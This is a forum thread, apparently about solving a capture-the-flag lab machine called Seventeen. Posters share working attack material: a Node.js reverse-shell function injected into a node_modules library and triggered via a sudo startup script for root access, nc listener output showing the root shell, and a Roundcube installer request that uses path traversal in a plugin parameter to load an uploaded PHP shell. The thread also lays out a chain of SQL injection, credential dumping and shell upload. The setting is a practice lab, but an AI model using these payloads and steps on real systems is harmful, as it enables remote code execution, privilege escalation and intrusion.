(June 2, 2022, 08:34 AM)Cipher Wrote:

(May 30, 2022, 03:13 AM)Himitsu Wrote:

(May 30, 2022, 01:54 AM)Peter Wrote:

(May 29, 2022, 06:27 AM)dude4695 Wrote: for root

better create 2 ssh connection 1 for running startup.sh and 1 for edit file

ssh1: sudo /opt/app/startup.sh

ssh2: vim /opt/app/node_modules/loglevel/lib/loglevel.js

and add this function on top in file

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("bash", []);
    var client = new net.Socket();
    client.connect(PORT, "IP", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

you will get this payload from here

https://www.revshells.com/

stop startup.sh app and run again you will get root shell

I dont make to run. a file desapiers. no reverse shell , de code to inject banish.    Any tip o idea. please

You need to do this a little bit faster, else loglevel directory will be removed.

Copy this function in memory (Ctrl+c) and replace with your IP and PORT:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("bash", []);
    var client = new net.Socket();
    client.connect(4000, "10.10.1X.XX", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

1. On Terminal 1, open SSH with kavi user
2. On Terminal 2, open a second SSH with kavi user
then prepare your command (but don't launch because file not yet exist):
vim /opt/app/node_modules/loglevel/lib/loglevel.js

3. On Terminal 3:
nc -lvnp 4000

4. On Terminal1:
sudo /opt/app/startup.sh

5. On Terminal 2:
launch your previous command and paste on the TOP your function in step 2
then write and exit (with :x it's more faster)

6. On Terminal1:
quit and re-run sudo /opt/app/startup.sh

7. On Terminal3:
we can see you reverse shell has been triggered:

─$ nc -lvnp 4000        
listening on [any] 4000 ...

connect to [10.10.XX.XX] from (UNKNOWN) [10.10.11.165] 50614
uid=0(root) gid=0(root) groups=0(root)

You need to switch quickly between your 2 sessions SSH for step 4, 5 and 6, that's all.

All explanation from @Dude4695 are enough.

"/opt/app/node_modules/loglevel/lib/loglevel.js" E212: Can't open file for writing

(June 4, 2022, 11:37 AM)sydewayzlocc Wrote: nothing new yet?

(June 4, 2022, 11:57 AM)coolbyte Stuck here too as you cannot get php shell ? is it possible via sqlmap to get a shell ? Wrote:

(June 4, 2022, 11:37 AM)sydewayzlocc Wrote: nothing new yet?

I am personally stuck.

I don't want spoilers nor solve the machine without understanding the steps.

I think that most of current solvers just went through an unintended path, as mostly people used RCE on file upload in the "oldmanagement" site.
It seems to me that the point of logging in the student site is to get the PDF file where it mentions the "mastermailer", but I cannot figure out a way to progress from here. It's possible to reconfigure Roudcube, but I didn't find a way to exctract some (useful) credentials or get a RCE.

(June 5, 2022, 07:16 AM)orangutang Wrote: Hi everybody. About @Yondaime316 method:

Folder /home/kavi/.npm is empty. And where is file package.tgz?
Thanks.

_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG

(June 5, 2022, 09:04 AM)coolbyte Wrote: Just to make the point of the situation for the people late to the party.



Almost none of the main steps described in the first pages of this thread still work, the machine has been patched 5 days ago.



The steps so far are:



1. Discover exam subdomain

2. SQLi on the id parameter

3. Dump student credentials from DB

4. Login into student panel

5. Upload malicious shell, BUT, you need to modify the stud_no parameter to "31234/.." , because PHP execution inside the 31234 folder is blocked

6 You can trigger the shell directly through seventeen.htb:8000/oldmanager/files/shell.php OR it can be triggered through a CVE of Roundcube. Obviously it doesn't make sense to complicate the situation, but I have a hunch that the Roundcube CVE was supposed to be the intended way, and that the machine maker just messed with .htaccess file. So most likely the steps were supposed to be:

6.1 Go to mailmaster.seventeen.htb:8000/mailmaster/installer/

6.2 Upload a new configuration, where you will intercept and modify one of the _plugins_NAME parameters

_step=2&_product_name=Seventeen+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Ftemp%2F&_des_key=iajOofMkjvHYKGsQZzdASvEh&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Fmastermailer%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=127.0.0.1&_dbname=roundcubedb&_dbuser=mysqluser&_dbpass=mysqlpassword&_db_prefix=&_default_host%5B%5D=127.0.0.1&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=127.0.0.1&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_example_addressbook=example_addressbook&_plugins_filesystem_attachments=filesystem_attachments&_plugins_help=../../../../../../../../var/www/html/oldmanagement/files/31234&submit=UPDATE+CONFIG

This will make roundcube load a file at path /var/www/html/mastermailer/plugins/../../../../../../var/www/html/oldmanagement/files/31234/../../../../../../var/www/html/oldmanagement/files/31234.php, which means that both the path 31234 and the file called 31234.php need to exist at the same level.

7. Once a shell is obtained in the container, you can find the credentials for Mark in the dbh.php file

8. SSH into the box as Mark



Here is were I stopped.



- The file where other users have previously found the password for kavi user is not readable anymore

- The /opt/app/node_modules/ directory is not writeable anymore, so the rogue JS package cannot be just written there

- There is a Verdaccio registry locally at port 4873, I am assuming that we should find a way to publish packages through it, but user registration is disabled and no anonymous publishing is allowed (and nor mark nor kavi have access to it). The configuration of verdaccio is not even readable (/etc/verdaccio).

- There is a whole mail stack on the machine, it is really strange that it would be completely useless for the machine to be solved.

- There is another web app on port 31225 which I am not sure what it is.

If someone finds a legit way to get the password for the kavi user (i.e., not just from /opt/app/node_modules/db-logger/) would be nice, I am giving up on this machine because it seems to be really poorly made and at this point is just a waste of time without much learning.